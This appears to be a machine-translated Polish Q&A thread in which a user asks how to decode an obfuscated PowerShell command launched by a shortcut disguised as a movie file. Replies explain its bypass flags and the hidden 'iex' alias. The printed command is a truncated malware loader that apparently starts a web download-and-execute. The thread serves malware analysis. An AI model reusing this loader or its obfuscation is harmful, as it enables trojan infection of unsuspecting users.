Jak zdekodować możliwe polecenie PowerShell złośliwego oprogramowania


0

Mam plik, który powinien być filmem, ale okazał się skrótem do wykonania polecenia PowerShell. Szczegóły są następujące:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.

Czy ktoś może doradzić, co zrobiłaby ta komenda PowerShell lub gdzie mogę znaleźć szczegółowe informacje na temat jej dekodowania

Dzięki


[1] biegnij, powershell.exe /?aby zobaczyć, jakie są pierwsze trzy -somethingpozycje. [2] biegnij, ( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')aby zobaczyć, co to jest. jeśli nie znasz aliasów, uruchom Get-Aliasz tego wyjście. [3] reszta to prawdopodobnie początek polecenia zakodowanego w standardzie base64. to nie wszystko, więc nie ma sposobu, aby się tego upewnić.
Lee_Dailey

Nie uruchamiaj żadnej części polecenia, jeśli nie jesteś pewien, co robisz i uważasz, że polecenie jest złośliwe.
root

Plik (o wielkości 750 MB i wyglądający jak plik filmowy) jest w rzeczywistości skrótem, a linia poleceń powyżej jest celem skrótu. Sprawdziłem i nie ma tam nic więcej, więc jeśli czegoś brakuje, musi to być jakaś zawartość.
kfbnlet,

Przedwcześnie opublikował poprzedni komentarz. Ran Malwarebytes, który zidentyfikował instalację instalacji trojana, kiedy uruchomiłem skrót, więc było to złośliwe oprogramowanie.
kfbnlet,

Odpowiedzi:


2

powershell.exe -NoPr -WINd 1 -eXEc ByP jest powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass

Polecenie, które próbuje wykonać, $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''jest w rzeczywistości iexaliasemInvoke-Expression

Uważam, że przegapiłeś część wiersza poleceń, więc trudno jest powiedzieć, co oznacza reszta.

Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.